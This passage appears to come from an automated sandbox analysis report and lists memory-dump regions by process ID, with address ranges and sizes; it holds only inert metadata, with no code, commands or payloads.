                                                                                            • memory/4420-653-0x0000000000000000-mapping.dmp
                                                                                            • memory/4420-641-0x00000000028F0000-0x00000000028F1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/4420-646-0x00000000029B0000-0x00000000029B1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/4420-650-0x0000000000000000-mapping.dmp
                                                                                            • memory/4420-644-0x0000000000000000-mapping.dmp
                                                                                            • memory/4504-93-0x00000000718D0000-0x0000000071FBE000-memory.dmp
                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/4504-119-0x00000000052F0000-0x000000000532D000-memory.dmp
                                                                                              Filesize

                                                                                              244KB

                                                                                            • memory/4504-94-0x0000000000510000-0x0000000000511000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/4504-90-0x0000000000000000-mapping.dmp
                                                                                            • memory/4524-984-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/4524-976-0x0000000000000000-mapping.dmp
                                                                                            • memory/4532-197-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/4532-191-0x0000000000000000-mapping.dmp
                                                                                            • memory/4612-528-0x0000000000000000-mapping.dmp
                                                                                            • memory/4648-75-0x0000000000000000-mapping.dmp
                                                                                            • memory/4664-966-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/4664-960-0x0000000000000000-mapping.dmp
                                                                                            • memory/4676-978-0x0000000000000000-mapping.dmp
                                                                                            • memory/4676-985-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/4712-1007-0x0000000000000000-mapping.dmp
                                                                                            • memory/4716-1006-0x0000000000000000-mapping.dmp
                                                                                            • memory/4736-424-0x0000000000000000-mapping.dmp
                                                                                            • memory/4736-429-0x00000000718D0000-0x0000000071FBE000-memory.dmp
                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/4740-97-0x0000000000000000-mapping.dmp
                                                                                            • memory/4776-77-0x0000000000000000-mapping.dmp
                                                                                            • memory/4780-192-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/4780-186-0x0000000000000000-mapping.dmp
                                                                                            • memory/4784-439-0x0000000000000000-mapping.dmp
                                                                                            • memory/4868-649-0x0000000000000000-mapping.dmp
                                                                                            • memory/4884-529-0x0000000000000000-mapping.dmp
                                                                                            • memory/4884-636-0x0000000000AF0000-0x0000000000B49000-memory.dmp
                                                                                              Filesize

                                                                                              356KB

                                                                                            • memory/4884-536-0x00000000718D0000-0x0000000071FBE000-memory.dmp
                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/4884-546-0x00000000003D0000-0x00000000003D1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/4892-201-0x0000000000000000-mapping.dmp
                                                                                            • memory/4892-209-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/4964-643-0x0000000000400000-0x0000000000434000-memory.dmp
                                                                                              Filesize

                                                                                              208KB

                                                                                            • memory/4964-645-0x0000000000417A8B-mapping.dmp
                                                                                            • memory/4964-648-0x0000000000400000-0x0000000000434000-memory.dmp
                                                                                              Filesize

                                                                                              208KB

                                                                                            • memory/4992-218-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/4992-210-0x0000000000000000-mapping.dmp
                                                                                            • memory/5024-998-0x0000000000000000-mapping.dmp
                                                                                            • memory/5028-190-0x0000000000000000-mapping.dmp
                                                                                            • memory/5028-195-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/5048-153-0x0000000007910000-0x0000000007911000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-175-0x00000000099B0000-0x00000000099E3000-memory.dmp
                                                                                              Filesize

                                                                                              204KB

                                                                                            • memory/5048-185-0x0000000009C80000-0x0000000009C81000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-155-0x0000000007A90000-0x0000000007A91000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-147-0x0000000000000000-mapping.dmp
                                                                                            • memory/5048-154-0x00000000079B0000-0x00000000079B1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-183-0x0000000009AE0000-0x0000000009AE1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-163-0x0000000007B40000-0x0000000007B41000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-182-0x0000000009970000-0x0000000009971000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-157-0x00000000083A0000-0x00000000083A1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-148-0x00000000718D0000-0x0000000071FBE000-memory.dmp
                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/5048-150-0x0000000004ED0000-0x0000000004ED1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-169-0x00000000089A0000-0x00000000089A1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-164-0x0000000008C20000-0x0000000008C21000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-233-0x0000000008C00000-0x0000000008C01000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-231-0x0000000009650000-0x0000000009651000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5048-151-0x0000000007B90000-0x0000000007B91000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5264-558-0x0000000000403BEE-mapping.dmp
                                                                                            • memory/5264-561-0x00000000718D0000-0x0000000071FBE000-memory.dmp
                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/5392-972-0x0000000000000000-mapping.dmp
                                                                                            • memory/5392-980-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/5396-476-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-466-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-249-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-554-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-547-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-281-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-279-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-245-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-275-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-310-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-273-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-246-0x0000000002930000-0x0000000002931000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5408-315-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-244-0x0000000000860000-0x0000000000861000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5408-628-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-540-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-271-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-305-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-530-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-565-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-524-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-520-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-298-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-318-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-516-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-321-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-512-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-509-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-506-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-570-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-269-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-267-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-502-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-324-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-497-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-327-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-329-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-491-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-488-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-486-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-483-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-481-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-479-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-477-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-572-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-474-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-472-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-470-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-468-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-283-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-464-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-462-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-635-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-460-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-458-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-574-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-454-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-576-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-633-0x0000000006EF0000-0x0000000006EF1000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5408-580-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-450-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-265-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-295-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-447-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-263-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-293-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-582-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-261-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-624-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-443-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-586-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-331-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-333-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-370-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-435-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-335-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-247-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-431-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-338-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-426-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-559-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-251-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-259-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-423-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-285-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-421-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-346-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-340-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-416-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-257-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-412-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-616-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-407-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-405-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-349-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-287-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-351-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-612-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-400-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-397-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-395-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-393-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-391-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-389-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-386-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-353-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-355-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-358-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-289-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-361-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-253-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-365-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-378-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-609-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-376-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-374-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-367-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-588-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-607-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-590-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-592-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-594-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-605-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-596-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-255-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-599-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-601-0x0000000000000000-mapping.dmp
                                                                                            • memory/5408-291-0x0000000000000000-mapping.dmp
                                                                                            • memory/5456-856-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/5456-888-0x000001CAF1750000-0x000001CAF1751000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5456-850-0x0000000000000000-mapping.dmp
                                                                                            • memory/5456-890-0x000001CAF1D50000-0x000001CAF1D51000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5456-905-0x000001CAF1790000-0x000001CAF1791000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5548-399-0x0000000000000000-mapping.dmp
                                                                                            • memory/5548-404-0x00000000718D0000-0x0000000071FBE000-memory.dmp
                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/5608-1003-0x0000000000000000-mapping.dmp
                                                                                            • memory/5672-958-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/5672-946-0x0000000000000000-mapping.dmp
                                                                                            • memory/5704-698-0x0000000000000000-mapping.dmp
                                                                                            • memory/5724-968-0x0000000000000000-mapping.dmp
                                                                                            • memory/5724-979-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/5864-629-0x0000000004BB0000-0x0000000004C01000-memory.dmp
                                                                                              Filesize

                                                                                              324KB

                                                                                            • memory/5864-415-0x0000000000000000-mapping.dmp
                                                                                            • memory/5864-504-0x0000000002A80000-0x0000000002ADC000-memory.dmp
                                                                                              Filesize

                                                                                              368KB

                                                                                            • memory/5920-977-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB

                                                                                            • memory/5920-967-0x0000000000000000-mapping.dmp
                                                                                            • memory/5972-297-0x0000000000000000-mapping.dmp
                                                                                            • memory/5972-302-0x00000000718D0000-0x0000000071FBE000-memory.dmp
                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/5972-500-0x0000000007D40000-0x0000000007D87000-memory.dmp
                                                                                              Filesize

                                                                                              284KB

                                                                                            • memory/5972-311-0x0000000000170000-0x0000000000171000-memory.dmp
                                                                                              Filesize

                                                                                              4KB

                                                                                            • memory/5988-834-0x0000000000000000-mapping.dmp
                                                                                            • memory/5996-300-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                              Filesize

                                                                                              588KB

                                                                                            • memory/5996-307-0x0000000000400000-0x0000000000493000-memory.dmp
                                                                                              Filesize

                                                                                              588KB

                                                                                            • memory/5996-304-0x000000000043FA56-mapping.dmp
                                                                                            • memory/6024-996-0x0000000000000000-mapping.dmp
                                                                                            • memory/6064-445-0x00000000718D0000-0x0000000071FBE000-memory.dmp
                                                                                              Filesize

                                                                                              6.9MB

                                                                                            • memory/6064-437-0x0000000000000000-mapping.dmp
                                                                                            • memory/6140-938-0x0000000000000000-mapping.dmp
                                                                                            • memory/6140-950-0x00007FFA60770000-0x00007FFA6115C000-memory.dmp
                                                                                              Filesize

                                                                                              9.9MB